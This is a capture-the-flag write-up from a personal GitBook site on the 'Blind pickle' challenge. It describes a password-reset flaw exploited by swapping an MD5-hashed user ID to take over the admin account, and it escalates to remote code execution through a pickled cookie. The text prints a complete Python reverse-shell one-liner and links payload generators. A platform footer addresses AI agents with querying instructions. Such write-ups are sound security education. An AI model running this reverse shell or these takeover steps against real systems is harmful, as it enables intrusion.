> For the complete documentation index, see [llms.txt](https://mistx0.gitbook.io/mistx0/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://mistx0.gitbook.io/mistx0/write-ups/onsite/ieee-ctf-aau/blind-pickle-400.md).

# Blind pickle (400)

<figure><img src="/files/ROWhWfqv63xslJgxo3g8" alt=""><figcaption></figcaption></figure>

Upon first inspecting the website, it appeared to be a standard application with a login function. My first step was to try signing up with a new user.

<figure><img src="/files/D8aZv8VXhuUYeai7WleV" alt=""><figcaption></figcaption></figure>

After signing up and logging in, I was presented with my user details: my username and my role, which was "member." My objective was to escalate this role to "admin."

\
![](/files/iMjWXYZGonbhyhVPVDxd)

My first idea was to inspect the cookies.

```
session=eyJsb2dnZWRpbiI6dHJ1ZSwicm9sZSI6Im1lbWJlciIsInVzZXJfaWQiOjQwLCJ1c2VybmFtZSI6Im1pc3QifQ.aQ4m5g.rKmnsBWjVQzgcCh00N7GrInVlEQ
```

It was a JWT. I attempted several attacks, like trying to forge a cookie without a signature or brute-forcing the secret, but nothing worked. I left it aside for a bit and continued my reconnaissance.

<figure><img src="/files/T4sFaQ0E6hxVQLlNJPPK" alt=""><figcaption></figcaption></figure>

I noticed there was a "change password" page. This seemed significant; there had to be a reason for its existence. I entered my username and email, paying close attention to the network tab to inspect the request and response. The first request was normal, sending my username and email, and I received a page asking for a new password in response.

<figure><img src="/files/2ENmDlt90E9QjTbhxL4H" alt=""><figcaption></figcaption></figure>

I proceeded with the password change, but this time I found something interesting in the request.

<figure><img src="/files/tIPGGQ1h8apHkrKUkzWh" alt=""><figcaption></figcaption></figure>

A UID was being sent along with my username. I copied its value:

```
d645920e395fedad7bbbed0eca3fe2e0
```

It looked like a hash. I took it to CrackStation, and my suspicion was correct: it was the MD5 hash of the number 40.

I remembered seeing a similar number. It was in my JWT cookie payload as the `user_id`.

```json
{

  "loggedin": true,

  "role": "member",

  "user_id": 40,

  "username": "mist"

}
```

With this knowledge, I realized I could potentially replace that hash with a different one, perhaps for `user_id = 1` and `username = admin`. The goal was to change the admin's password to gain access.

<figure><img src="/files/22ozIAdO2mc9EPrrZ2mb" alt=""><figcaption></figcaption></figure>

It worked! I successfully changed the password for the admin account and was able to log in.

<figure><img src="/files/cGjqjEWBl58w9lahuICH" alt=""><figcaption></figcaption></figure>

Once logged in as admin, I found an admin panel. My first thought was SQL injection, but the challenge name was "pickle," which pointed toward a specific Python library. There was also no obvious place to input a query.

However, there was a button. I clicked it while monitoring the network tab.

<figure><img src="/files/MurpTV5qQrHQxCOF4hOy" alt=""><figcaption></figcaption></figure>

A new cookie appeared: `adminprefs`. Its value looked like Base64. After some research on Python's pickle library, I discovered that it can be vulnerable to Remote Code Execution (RCE) if it deserializes untrusted data.

{% embed url="<https://medium.com/@rajk88/how-to-exploit-python-pickle-vulnerability-1144c28ec022>" %}

I needed to test if the website was vulnerable. I used a reverse shell payload from

```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("REDACTED",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
```

To craft the final exploit, I used a public repository to generate the malicious pickle payload. I set up an ngrok TCP tunnel for my IP and started a `netcat` listener on the corresponding port.

**Reverse shell generator:**

{% embed url="<https://www.revshells.com/>" %}

**The github repo for the pickle payload:**

{% embed url="<https://github.com/shafdo/pickle-payload-gen-python3/blob/master/pickle-payload-gen.py>" %}

Finally, I placed the generated payload into the `adminprefs` cookie, refreshed the page, and successfully received a reverse shell on my listener.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://mistx0.gitbook.io/mistx0/write-ups/onsite/ieee-ctf-aau/blind-pickle-400.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.